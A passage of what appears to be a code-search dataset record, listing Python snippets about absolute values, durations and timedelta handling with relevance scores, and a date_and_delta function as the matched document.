absolute_value(val):\n a = np.round(val/100.*np.array(cum_hours).sum(), 0)\n return a", "def get_duration(self):\n return (self.stop_day - self.start_day) * (24 * 60) \\\n + (self.stop_hour - self.start_hour) * 60", "def abs(x):\n pass", "def dst (self, dt):\n return self.__ZeroDuration", "def get_abs_dist(self, pos1, pos2):\n\t\treturn min(abs(pos1 - pos2), abs(pos1 - pos2 + 360))", "def absIP(self):\n np.fabs(self.t, out=self.t)\n return self", "def __abs__( self ):\r\n\t\tif ( self < 0 ): return -self\r\n\t\telse: return self", "def abs(data):\n return _make.abs(data)", "def __abs__ (self) :\n return self.__class__ (abs (self.radians))", "def relative_datetime(self):\n now = datetime.now(timezone.utc)\n created_at = self.created_at.astimezone(timezone.utc)\n\n delta = humanize.naturaldelta(abs(created_at - now))\n tense = \"from now\" if now < created_at else \"ago\"\n\n return f\"{delta} {tense}\"", "def to_timedelta(value) -> timedelta:\n\n # For values >=24hrs, Pandas converts them to a datetime object.\n # For values <24hrs, Pandas converts them to time object.\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, datetime):\n return value - datetime(1900, 1, 1) + timedelta(hours=24)\n elif isinstance(value, time):\n return datetime.combine(date.min, value) - datetime.min\n elif isinstance(value, str):\n duration_regex = re.compile(\n r\"^(?P<sign>-?)(?P<hours>[0-9]+?):(?P<minutes>[0-9]{2})$\"\n )\n parts = duration_regex.match(value.strip())\n if parts is not None:\n sign = parts.group(\"sign\")\n hours = float(parts.group(\"hours\"))\n minutes = float(parts.group(\"minutes\"))\n if sign == \"-\":\n hours = hours * (-1)\n minutes = minutes * (-1)\n return timedelta(hours=hours, minutes=minutes)\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta \"\n \"object. \"\n f\"Values was {value} and type was {type(value)}.\"\n )\n\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta object. 
\"\n f\"Value was {value} and type was {type(value)}.\"\n )\n\n return timedelta(0)", "def distance(self):\n return Distance(length_of(self.position.au))", "def magabs(self):\n if not self.has_target():\n raise AttributeError(\"No target defined, I can't get the distance\")\n return self.mag - 5*( np.log10(self.target.distmpc*1.e6) - 1)", "def calc_time(self, distance):\r\n if distance < 400:\r\n return 2*math.sqrt(distance / 1406.25)\r\n else:\r\n distance -= 400\r\n return distance / 750 + 16 / 15", "def __abs__(self):\n\t\tval = abs(self.val)\n\t\tif 0 in self.val:\n\t\t\traise ValueError(\"Absolute value is not differentiable at 0.\")\n\n\t\tder_copy = np.copy(self.der)\n\t\tif len(der_copy.shape):\n\t\t\tfor i, val_i in enumerate(self.val):\n\t\t\t\tif val_i < 0:\n\t\t\t\t\tder_copy[i] = -1 * der_copy[i]\n\t\treturn Var(val, der_copy)", "def abs__inplace(a):", "def get_time_delta(n):\n return datetime.timedelta(days=n)", "def testAbsDist():\n units = unitsystem.UnitSystem()\n assert units.absorption_distance(25000, 3) == 0.13377926628219666\n assert units.absorption_distance(25000, 2) == 0.07525083728373562\n assert units.absorption_distance(25000, 3) / units.absorption_distance(12500, 3) == 2.", "def scalar_abs(self, dst, src):\n return self._scalar_single_func('abs', dst, src)", "def duration(self):\r\n return self.t2 - self.t1", "def absolute_value(x):\n x_star = x.clone()\n x_star[1] *= -1\n return elementwise_mult(x, x_star)[0].sqrt_()", "def duration(self):\n delta = self.occurrence.end - self.occurrence.start\n real_hours = delta.days * 24 + delta.seconds / (60.0 * 60.0)\n\n adjusted_hours = attendance_settings.HOUR_MULTIPLIER * real_hours\n\n return adjusted_hours", "def timeToOffset(self, abstractTime, timescale='seconds'):\n return datetime.timedelta(**{timescale: abstractTime})", "def test_abs():\n \n assert (abs(Quantity(-1, unit('m'))) ==\n abs(Quantity(1, unit('m'))) ==\n Quantity(1, unit('m')))", "def handle(self, value, context: typing.MutableMapping):\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, int):\n return timedelta(milliseconds=int(value * self.resolution))\n try:\n return timedelta(\n milliseconds=int(Decimal(value) * self.resolution))\n except (ValueError, InvalidOperation):\n pass\n\n match = self.duration_re.match(value)\n if not match:\n self.report(value, context)\n return None\n\n params = {\n key: int(value)\n for key, value in match.groupdict().items()\n if value\n }\n return timedelta(**params)", "def time_diff(dt1, dt2):\n return abs(int((dt2 - dt1).total_seconds()))", "def _subtract_times(self, a, b):\n td = a - b\n return td.days * 24 * 60 + td.seconds // 60", "def duration(self):\n return self.end_abs - self.start", "def get_abs_tolerance(self):\n\n if Test.global_abs_tolerance is None:\n return self._abs_tolerance\n return Test.global_abs_tolerance", "def __timedelta_millis(td):\n return int(round(td.total_seconds(), 3) * 1000)", "def absolute(x):\n return -x if x < 0 else x", "def abs_(arg):\n ...", "def __abs__ (self) :\n return self.__class__ (abs (self.degrees))", "def __abs__(self):\n out = self.copy()\n out.addFunction(Query.Function.Abs)\n return out", "def end_abs(self):\n if self.end == float('inf'):\n return self.track.duration\n else:\n return self.end", "def time_to_point(distance):\n if distance <= (125 / 9) ** 2:\n return distance ** .5\n return distance * 9 / 250 + 125 / 18", "def get_Delta (self, t):\n\n if t < self.t_dress_begin or t > self.t_undress_end:\n Delta = self.Delta_max\n dDelta_dt = 0\n\n 
elif t < self.t_dress_end:\n t_zeroed = t - self.t_dress_begin\n Delta = self.Delta_max \\\n + (self.Delta_min - self.Delta_max) / (self.t_dress_end - self.t_dress_begin) * t_zeroed\n dDelta_dt = (self.Delta_min - self.Delta_max) / (self.t_dress_end - self.t_dress_begin)\n\n elif t > self.t_undress_begin:\n t_zeroed = t - self.t_undress_begin\n Delta = self.Delta_min \\\n + (self.Delta_max - self.Delta_min) / (self.t_undress_end - self.t_undress_begin) * t_zeroed\n dDelta_dt = (self.Delta_max - self.Delta_min) / (self.t_undress_end - self.t_undress_begin)\n else:\n Delta = self.Delta_min\n dDelta_dt = 0\n\n return Delta, dDelta_dt", "def parse_timedelta(value: Optional[str]):\n if not value:\n return None\n unit = value[-1]\n amount = int(value[0:-1])\n if unit == \"h\":\n return timedelta(hours=amount)\n elif unit == \"m\":\n return timedelta(minutes=amount)\n elif unit == \"d\":\n return timedelta(days=amount)\n else:\n raise ValueError(f\"Invalid time unit: {value}\")", "def timedelta_to_duration(obj: \"timedelta\") -> \"Duration\":\n d = Duration()\n d.seconds = int(obj.total_seconds())\n d.nanos = obj.microseconds * 1000\n return d", "def realtime_to_ingame_delta(sec: float) -> timedelta:\n return timedelta(days=SECONDS_TO_DAYS * sec)", "def _normalizeDeltaTime(self, dt : float) -> float:\n return dt / self.tau", "def __abs__(self):\n return abs(self._fsm.get(self._id))", "def absolute_distance(cls, q0, q1):\n q0_minus_q1 = q0 - q1\n q0_plus_q1 = q0 + q1\n d_minus = q0_minus_q1.norm\n d_plus = q0_plus_q1.norm\n if (d_minus < d_plus):\n return d_minus\n else:\n return d_plus", "def _adjusted_time(self, otime: float = 0):\n if 'xtime_adjustment' in self.__timing_parameters:\n return time.time() - self.__timing_parameters['xtime_adjustment'] - otime\n else:\n return time.time() - otime", "def absolute_magnitude(self):\n return self._absolute_magnitude", "def timestep(self) -> Optional[float]:\n dt = None\n if len(self.time) > 1 and self.is_equidistant:\n dt = (self.time[1] - self.time[0]).total_seconds() # type: ignore\n return dt", "def __sub__(self, other):\n if not isinstance(other, real_datetime):\n if isinstance(other, real_timedelta):\n return self + -other\n return NotImplemented\n\n days1 = self.toordinal()\n days2 = other.toordinal()\n secs1 = self._second + self._minute * 60 + self._hour * 3600\n secs2 = other.second + other.minute * 60 + other.hour * 3600\n base = timedelta(\n days1 - days2, secs1 - secs2, self._microsecond - other.microsecond\n )\n if self._tzinfo is other.tzinfo:\n return base\n myoff = self.utcoffset()\n otoff = other.utcoffset()\n if myoff == otoff:\n return base\n if myoff is None or otoff is None:\n raise TypeError(\"cannot mix naive and timezone-aware time\")\n return base + otoff - myoff", "def duration(self):\r\n return (self.end_time or time.time()) - self.start_time", "def abs(f):\n return f.per(dmp_abs(f.rep, f.lev, f.dom))", "def __abs__(self):\r\n raise TypeError(f\"bad operand type for abs(): '{type(self).__name__}'\")", "def timedeltaToFloat(self,time_d):\n time_d_min = time_d / timedelta(minutes=1)\n time_d_s = time_d / timedelta(seconds=1)\n time_d_ms = time_d / timedelta(milliseconds=1)\n\n return (time_d_min * 60 + time_d_s + time_d_ms * 0.001)", "def abs(self):\n return math.sqrt(self['real'] * self['real'] + self['imaginary'] * self['imaginary'])", "def alarm_length():\n start = datetime.time(hour=alarm_start_hour, minute=alarm_start_minute)\n stop = datetime.time(hour=alarm_stop_hour, minute=alarm_stop_minute)\n\n delta = 
datetime.timedelta(hours=stop.hour - start.hour, minutes=stop.minute - start.minute)\n\n return delta.seconds", "def __abs__(self):\n abspos = abs(self.pos)\n absvel = abs(self.vel)\n return np.amax((abspos, absvel))", "def GetAbsBeer(epsilon, conc, pathLength):\n return epsilon * conc * pathLength", "def _normalizeTime(self, t : float) -> float:\n return (t - self.t0)/self.tau", "def absolute_offset(self, offset):\n return self._offset + offset", "def date_and_delta(value):\n now = datetime.datetime.now()\n if isinstance(value, datetime.datetime):\n date = value\n delta = now - value\n elif isinstance(value, datetime.timedelta):\n date = now - value\n delta = value\n else:\n try:\n value = int(value)\n delta = datetime.timedelta(seconds=value)\n date = now - delta\n except (ValueError, TypeError):\n return None, value\n return date, abs_timedelta(delta)", "def GetAbsoluteDay(self):\n if not self.Complete():\n raise DateTimeError(\"absolute day requires complete date\")\n absYear = self.century * 100 + self.year - 1\n return (absYear // 4) - (absYear // 100) + (absYear // 400) + \\\n (absYear * 365) + self.GetOrdinalDay()[2]", "def __abs__(self):\n return type(self)(abs(self.number))", "def abs(n):\n if n > 0:\n return n\n else:\n return -n", "def difference_from_time_instance(self, time: __class__):\n\n return self - time", "def get_time_diff(start_time, end_time):\n time_diff = end_time - start_time\n return timedelta(seconds=int(round(time_diff)))", "def duration(self) -> datetime.timedelta:\n return self._duration", "def distance_from(self, other) -> int:\n assert isinstance(other, CustomDate), \"You must pass a valid CustomDate object\"\n return (self.minutes() - other.minutes()) + (self - other) * 24 * 60", "def get_time_with_delta(string):\n\n # If it looks like an ISO time, return that.\n try:\n absolute = pscheduler.iso8601_as_datetime(string)\n # Default behavior is to localize naive times.\n if absolute.tzinfo is None:\n absolute = pytz.utc.localize(absolute)\n return pscheduler.datetime_as_iso8601(absolute)\n except ValueError:\n pass\n\n try:\n if string[0:1] == \"+P\":\n delta = pscheduler.iso8601_as_timedelta(string[1:])\n elif string[0:1] == \"-P\":\n delta = -1 * pscheduler.iso8601_as_timedelta(string[1:])\n else:\n pass\n except ValueError:\n pscheduler.fail(\"Invalid time delta '%s'\" % (string))\n\n # Let this throw what it's going to throw.\n delta = pscheduler.iso8601_as_timedelta(string)\n\n return pscheduler.datetime_as_iso8601(\n pscheduler.time_now() + delta)", "def time_to_next_ageout(self) -> Optional[float]:\n if not len(self):\n return None\n\n insertion_time_earliest = min(map(lambda t: t[1], self.values()))\n age_out_time = insertion_time_earliest + self._lifetime\n delta = age_out_time - time.monotonic()\n\n return delta", "def negative(a: Decimal) -> Decimal:\n return -a", "def duration(self):\n return float('{0:.2f}'.format(self.end_time - self.start_time))", "def manhatam_distance(self) -> int:\n return abs(self.position[0]) + abs(self.position[1])", "def __abs__(self):\n return self.magnitude()", "def get_duration(self):\n return float(self.time.iloc[-1] - self.time.iloc[0])" ]
[ "0.75997627", "0.6525403", "0.64160365", "0.6255736", "0.58985287", "0.58082616", "0.57936674", "0.573392", "0.569296", "0.56611925", "0.56431794", "0.56412184", "0.56401443", "0.5639377", "0.5544877", "0.5541361", "0.5524112", "0.5501755", "0.547358", "0.54723006", "0.54522437", "0.54519135", "0.5440847", "0.5408365", "0.54063404", "0.5403135", "0.5398996", "0.5394417", "0.53897077", "0.5384018", "0.53831774", "0.5378582", "0.53667927", "0.5328425", "0.532611", "0.5317814", "0.5307131", "0.52998984", "0.5288602", "0.5287825", "0.5287481", "0.5277267", "0.5270742", "0.52347296", "0.5233617", "0.5231283", "0.5213888", "0.5198821", "0.5196889", "0.5179608", "0.5174761", "0.51743364", "0.5164766", "0.5157884", "0.51539665", "0.5138161", "0.51311207", "0.51303244", "0.5122739", "0.5121538", "0.51146746", "0.5114599", "0.5104098", "0.5095512", "0.5086197", "0.5079575", "0.50759906", "0.5041165", "0.50399464", "0.5039128", "0.50386125", "0.50334334", "0.5033426", "0.50032115", "0.49957794", "0.49946892", "0.49923167", "0.49917036", "0.4978129", "0.49718395", "0.49688545", "0.49671537", "0.4964641", "0.49618676", "0.4959226", "0.49559158", "0.49550366", "0.49458984", "0.4933127", "0.49302006", "0.4911928", "0.49100322", "0.4908613", "0.4891059", "0.48879814", "0.48876595", "0.48825765", "0.48821938", "0.48684633", "0.48679525" ]
0.7604547
0
Turn a value into a date and a timedelta which represents how long ago it was. If that's not possible, return (None, value).
def date_and_delta(value):
    now = datetime.datetime.now()
    if isinstance(value, datetime.datetime):
        date = value
        delta = now - value
    elif isinstance(value, datetime.timedelta):
        date = now - value
        delta = value
    else:
        try:
            value = int(value)
            delta = datetime.timedelta(seconds=value)
            date = now - delta
        except (ValueError, TypeError):
            return None, value
    return date, abs_timedelta(delta)
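A minimal runnable sketch (an editorial illustration, not part of the dataset record): it pastes the positive document in verbatim and exercises its three branches. The abs_timedelta helper is an assumption here, copied from the variant that appears among the negatives below, since the record itself does not ship it.

import datetime


def abs_timedelta(delta):
    # Negative timedeltas normalize as (-1 day, 86399 seconds, ...), so
    # flip them by measuring from "now" back to "now + delta".
    if delta.days < 0:
        now = datetime.datetime.now()
        return now - (now + delta)
    return delta


def date_and_delta(value):
    now = datetime.datetime.now()
    if isinstance(value, datetime.datetime):
        date = value
        delta = now - value
    elif isinstance(value, datetime.timedelta):
        date = now - value
        delta = value
    else:
        try:
            value = int(value)
            delta = datetime.timedelta(seconds=value)
            date = now - delta
        except (ValueError, TypeError):
            return None, value
    return date, abs_timedelta(delta)


# A datetime passes through as the date; the delta is its age.
date, delta = date_and_delta(datetime.datetime.now() - datetime.timedelta(hours=2))
assert abs(delta - datetime.timedelta(hours=2)) < datetime.timedelta(seconds=1)

# A plain integer is read as "this many seconds ago".
date, delta = date_and_delta(90)
assert delta == datetime.timedelta(seconds=90)

# Anything unparseable comes back unchanged, paired with None.
assert date_and_delta("not a time") == (None, "not a time")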
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def date_and_delta(value):\r\n now = _now()\r\n if isinstance(value, datetime):\r\n date = value\r\n delta = now - value\r\n elif isinstance(value, timedelta):\r\n date = now - value\r\n delta = value\r\n else:\r\n try:\r\n value = int(value)\r\n delta = timedelta(seconds=value)\r\n date = now - delta\r\n except (ValueError, TypeError):\r\n return (None, value)\r\n return date, abs_timedelta(delta)", "def naturaltime(value):\n try:\n value = datetime.datetime(value.year, value.month, value.day, value.hour, value.minute, value.second)\n except AttributeError:\n return value\n except ValueError:\n return value\n\n if getattr(value, 'tzinfo', None):\n now = datetime.datetime.now(LocalTimezone(value))\n else:\n now = datetime.datetime.now()\n now = now - timedelta(0, 0, now.microsecond)\n if value < now:\n delta = now - value\n if delta.days != 0:\n return pgettext(\n 'naturaltime', '%(delta)s ago'\n ) % {'delta': defaultfilters.timesince(value)}\n elif delta.seconds == 0:\n return _(u'now')\n elif delta.seconds < 60:\n return ungettext(\n u'a second ago', u'%(count)s seconds ago', delta.seconds\n ) % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return ungettext(\n u'a minute ago', u'%(count)s minutes ago', count\n ) % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return ungettext(\n u'an hour ago', u'%(count)s hours ago', count\n ) % {'count': count}\n else:\n delta = value - now\n if delta.days != 0:\n return pgettext(\n 'naturaltime', '%(delta)s from now'\n ) % {'delta': defaultfilters.timeuntil(value)}\n elif delta.seconds == 0:\n return _(u'now')\n elif delta.seconds < 60:\n return ungettext(\n u'a second from now', u'%(count)s seconds from now', delta.seconds\n ) % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return ungettext(\n u'a minute from now', u'%(count)s minutes from now', count\n ) % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return ungettext(\n u'an hour from now', u'%(count)s hours from now', count\n ) % {'count': count}", "def _get_delta(self, now, then):\n if now.__class__ is not then.__class__:\n now = datetime.date(now.year, now.month, now.day)\n then = datetime.date(then.year, then.month, then.day)\n if now < then:\n raise ValueError(\"Cannot determine moderation rules because date field is set to a value in the future\")\n return now - then", "def naturaltime(value, future=False, months=True):\r\n now = _now()\r\n date, delta = date_and_delta(value)\r\n if date is None:\r\n return value\r\n # determine tense by value only if datetime/timedelta were passed\r\n if isinstance(value, (datetime, timedelta)):\r\n future = date > now\r\n\r\n ago = _('%s from now') if future else _('%s ago')\r\n delta = naturaldelta(delta)\r\n\r\n if delta == _(\"a moment\"):\r\n return _(\"now\")\r\n\r\n return ago % delta", "def make_datetime(value):\n if value:\n return value\n return None", "def ago(self):\n return human(self.timestamp/1000.0, precision=1, abbreviate=True)", "def _parse_date(value):\n # Check for day-month pattern\n day_month_text = re.match(\"^(\\d{1,2})-(\\d{2})$\", value)\n if day_month_text:\n day = int(day_month_text.group(1))\n month = int(day_month_text.group(2))\n return datetime(datetime.now().year, month, day)\n\n # I assume Polish locale\n parts = value.strip().split(maxsplit=1)\n amount = int(parts[0])\n for hour_part in TIMEDELTA_HOURS:\n if hour_part in parts[1]:\n delta = timedelta(hours=amount)\n break\n else:\n for minute_part in 
TIMEDELTA_MINS:\n if minute_part in parts[1]:\n delta = timedelta(minutes=amount)\n break\n return datetime.now() - delta", "def SAgeDdt(ddt):\n if ddt.days < 0:\n return \"in the future?\"\n months = int(ddt.days*12/365)\n years = int(ddt.days/365)\n if years >= 1:\n return \"%d year%s ago\" % (years, SPlural(years))\n if months >= 3:\n return \"%d months ago\" % months \n if ddt.days == 1:\n return \"yesterday\"\n if ddt.days > 1:\n return \"%d days ago\" % ddt.days\n hrs = int(ddt.seconds/60/60)\n if hrs >= 1:\n return \"%d hour%s ago\" % (hrs, SPlural(hrs))\n minutes = round(ddt.seconds/60)\n if minutes < 1:\n return \"seconds ago\"\n return \"%d minute%s ago\" % (minutes, SPlural(minutes))", "def relativeTime(date):\n diff = datetime.utcnow() - date\n\n if diff.days > 7 or diff.days < 0:\n return date.ctime()\n elif diff.days == 1:\n return '1 day ago'\n elif diff.days > 1:\n return '%d days ago' % diff.days\n elif diff.seconds <= 1:\n return 'just now'\n elif diff.seconds < 60:\n return '%d seconds ago' % diff.seconds\n elif diff.seconds < (60 * 2):\n return '1 minute ago'\n elif diff.seconds < (60 * 60):\n return '%d minutes ago' % (diff.seconds / 60)\n elif diff.seconds < (60 * 60 * 2):\n return '1 hour ago'\n else:\n return '%d hours ago' % (diff.seconds / (60 * 60))", "def time_since(dt, default=\"just now\"):\n\t\n\tnow = datetime.utcnow()\n\tdiff = now - dt\n\t\n\tperiods = (\n\t\t(diff.days / 365, \"year\", \"years\"),\n\t\t(diff.days / 30, \"month\", \"months\"),\n\t\t(diff.days / 7, \"week\", \"weeks\"),\n\t\t(diff.days, \"day\", \"days\"),\n\t\t(diff.seconds / 3600, \"hour\", \"hours\"),\n\t\t(diff.seconds / 60, \"minute\", \"minutes\"),\n\t\t(diff.seconds, \"second\", \"seconds\"),\n\t)\n\n\tfor period, singular, plural in periods:\n\t\tif period:\n\t\t\treturn \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n\treturn default", "async def _parse_value(self, responses: SourceResponses) -> Value:\n commit_responses = responses[1:]\n return str(days_ago(max([parse((await response.json())[\"committed_date\"]) for response in commit_responses])))", "def timesince(dt, default=\"just now\"):\n\n now = datetime.datetime.now()\n diff = now - dt\n \n periods = (\n (diff.days / 365, \"year\", \"years\"),\n (diff.days / 30, \"month\", \"months\"),\n (diff.days / 7, \"week\", \"weeks\"),\n (diff.days, \"day\", \"days\"),\n (diff.seconds / 3600, \"hour\", \"hours\"),\n (diff.seconds / 60, \"minute\", \"minutes\"),\n (diff.seconds, \"second\", \"seconds\"),\n )\n\n for period, singular, plural in periods:\n \n if period:\n return \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n return default", "def howLongAgo(time=False):\n now = timezone.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"genau jetzt\"\n if second_diff < 60:\n return \"vor \" + str(second_diff) + \" Sek.\"\n if second_diff < 120:\n return \"vor einer Min.\"\n if second_diff < 3600:\n return \"vor \" + str( second_diff / 60 ) + \" Min.\"\n if second_diff < 7200:\n return \"vor einer St.\"\n if second_diff < 86400:\n return \"vor \" + str( second_diff / 3600 ) + \" St.\"\n if day_diff == 1:\n return \"Gestern\"\n if day_diff < 7:\n return \"vor \" + str(day_diff) + \" Tagen\"\n if day_diff < 31:\n return \"vor \" + str(day_diff/7) + \" 
Wochen\"\n if day_diff < 365:\n return \"vor \" + str(day_diff/30) + \" Monaten\"\n return \"vor \" + str(day_diff/365) + \" Jahren\"", "def shorttimesince(value, arg=None):\r\n from django.utils.timesince import timesince\r\n if not value:\r\n return u''\r\n if arg:\r\n return calculate_shorttimesince(arg, value)\r\n return calculate_shorttimesince(value)", "def pretty_date(time=False):\n now = datetime.datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n day_diff *= -1\n second_diff *= -1\n if day_diff < 1:\n if second_diff < 10:\n return ugettext('imminently')\n if second_diff < 60:\n return ungettext('{n} second from now', '{n} seconds from now', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('in a minute')\n if second_diff < 3600:\n return ungettext('{n} minute from now', '{n} minutes from now', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('in an hour')\n if second_diff < 86400:\n return ungettext('{n} hour from now', '{n} hours from now', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('tomorrow')\n if day_diff < 7:\n return ungettext('{n} day from now', '{n} days from now', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week from now', '{n} weeks from now', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month from now', '{n} months from now', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year from now', '{n} years from now', day_diff / 365).format(n=day_diff / 365)\n\n if day_diff == 0:\n if second_diff < 10:\n return ugettext('just now')\n if second_diff < 60:\n return ungettext('{n} second ago', '{n} seconds ago', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('a minute ago')\n if second_diff < 3600:\n return ungettext('{n} minute ago', '{n} minutes ago', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('an hour ago')\n if second_diff < 86400:\n return ungettext('{n} hour ago', '{n} hours ago', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('yesterday')\n if day_diff < 7:\n return ungettext('{n} day ago', '{n} days ago', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week ago', '{n} weeks ago', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month ago', '{n} months ago', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year ago', '{n} years ago', day_diff / 365).format(n=day_diff / 365)", "def abs_timedelta(delta):\n if delta.days < 0:\n now = datetime.datetime.now()\n return now - (now + delta)\n return delta", "def naturaltime(value):\n if not isinstance(value, date): # datetime is a subclass of date\n return value\n\n now = datetime.now(utc if is_aware(value) else None)\n if value < now:\n delta = now - value\n if delta.days != 0:\n return 'hace %(delta)s' % {'delta': defaultfilters.timesince(value)}\n elif delta.seconds == 0:\n return 'ahora'\n elif delta.seconds < 60:\n return u'hace %(count)s segundos' % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return u'hace %(count)s minutos' % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return 
u'hace %(count)s horas' % {'count': count}", "def abs_timedelta(delta):\r\n if delta.days < 0:\r\n now = _now()\r\n return now - (now + delta)\r\n return delta", "def pretty_date(time=False):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(round(second_diff, 0))) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(round(second_diff / 60, 0))) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(round(second_diff / 3600, 0))) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(int(round(day_diff, 0))) + \" days ago\"\n if day_diff < 31:\n return str(int(round(day_diff / 7, 0))) + \" weeks ago\"\n if day_diff < 365:\n return str(int(round(day_diff / 30, 0))) + \" months ago\"\n return str(int(round(day_diff / 365, 0))) + \" years ago\"", "def pretty_date(time=False):\r\n from datetime import datetime\r\n import dateutil.parser\r\n now = datetime.now()\r\n if type(time) is str or type(time) is unicode:\r\n time = dateutil.parser.parse(time)\r\n if type(time) is int:\r\n diff = now - datetime.fromtimestamp(time)\r\n elif isinstance(time, datetime):\r\n diff = now - time\r\n elif not time:\r\n diff = now - now\r\n second_diff = diff.seconds\r\n day_diff = diff.days\r\n\r\n if day_diff < 0:\r\n return ''\r\n\r\n if day_diff == 0:\r\n if second_diff < 10:\r\n return \"just now\"\r\n if second_diff < 60:\r\n return str(second_diff) + \" seconds ago\"\r\n if second_diff < 120:\r\n return \"a minute ago\"\r\n if second_diff < 3600:\r\n return ' '.join([str(second_diff / 60), \"minutes ago\"])\r\n if second_diff < 7200:\r\n return \"an hour ago\"\r\n if second_diff < 86400:\r\n return ' '.join([str(second_diff / 3600), \"hours ago\"])\r\n if day_diff == 1:\r\n return \"Yesterday\"\r\n if day_diff < 7:\r\n return ' '.join([str(day_diff), \"days ago\"])\r\n if day_diff < 31:\r\n return ' '.join([str(day_diff / 7), \"weeks ago\"])\r\n if day_diff < 60:\r\n return ' '.join([str(day_diff / 30), \"month ago\"])\r\n if day_diff < 365:\r\n return ' '.join([str(day_diff / 30), \"months ago\"])\r\n if day_diff < (365 * 2):\r\n return ' '.join([str(day_diff / 365), \"year ago\"])\r\n return ' '.join([str(day_diff / 365), \"years ago\"])", "def handle(self, value, context: typing.MutableMapping):\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, int):\n return timedelta(milliseconds=int(value * self.resolution))\n try:\n return timedelta(\n milliseconds=int(Decimal(value) * self.resolution))\n except (ValueError, InvalidOperation):\n pass\n\n match = self.duration_re.match(value)\n if not match:\n self.report(value, context)\n return None\n\n params = {\n key: int(value)\n for key, value in match.groupdict().items()\n if value\n }\n return timedelta(**params)", "def timedelta_filter(date_value, **kwargs):\n\n current_date = parse_datetime(date_value)\n return (current_date - timedelta(**kwargs))", "def get_entry_date(input):\n if input and \"date\" in input.keys():\n return input[\"date\"], input[\"date\"] + timedelta(minutes=1)\n return None, None", "def to_timedelta(value) -> 
timedelta:\n\n # For values >=24hrs, Pandas converts them to a datetime object.\n # For values <24hrs, Pandas converts them to time object.\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, datetime):\n return value - datetime(1900, 1, 1) + timedelta(hours=24)\n elif isinstance(value, time):\n return datetime.combine(date.min, value) - datetime.min\n elif isinstance(value, str):\n duration_regex = re.compile(\n r\"^(?P<sign>-?)(?P<hours>[0-9]+?):(?P<minutes>[0-9]{2})$\"\n )\n parts = duration_regex.match(value.strip())\n if parts is not None:\n sign = parts.group(\"sign\")\n hours = float(parts.group(\"hours\"))\n minutes = float(parts.group(\"minutes\"))\n if sign == \"-\":\n hours = hours * (-1)\n minutes = minutes * (-1)\n return timedelta(hours=hours, minutes=minutes)\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta \"\n \"object. \"\n f\"Values was {value} and type was {type(value)}.\"\n )\n\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta object. \"\n f\"Value was {value} and type was {type(value)}.\"\n )\n\n return timedelta(0)", "def _subtract_times(self, a, b):\n td = a - b\n return td.days * 24 * 60 + td.seconds // 60", "def relative_datetime(self):\n now = datetime.now(timezone.utc)\n created_at = self.created_at.astimezone(timezone.utc)\n\n delta = humanize.naturaldelta(abs(created_at - now))\n tense = \"from now\" if now < created_at else \"ago\"\n\n return f\"{delta} {tense}\"", "def _time_delta_from_info(info):\n now = datetime.datetime.now()\n then = info.start_time\n return str(now.replace(microsecond=0) - then.replace(microsecond=0))", "def naturaldelta(value, months=True):\r\n now = _now()\r\n date, delta = date_and_delta(value)\r\n if date is None:\r\n return value\r\n\r\n use_months = months\r\n\r\n seconds = abs(delta.seconds)\r\n days = abs(delta.days)\r\n years = days // 365\r\n days = days % 365\r\n months = int(days // 30.5)\r\n\r\n if not years and days < 1:\r\n if seconds == 0:\r\n return _(\"a moment\")\r\n elif seconds == 1:\r\n return _(\"a second\")\r\n elif seconds < 60:\r\n return ngettext(\"%d second\", \"%d seconds\", seconds) % seconds\r\n elif 60 <= seconds < 120:\r\n return _(\"a minute\")\r\n elif 120 <= seconds < 3600:\r\n minutes = seconds // 60\r\n return ngettext(\"%d minute\", 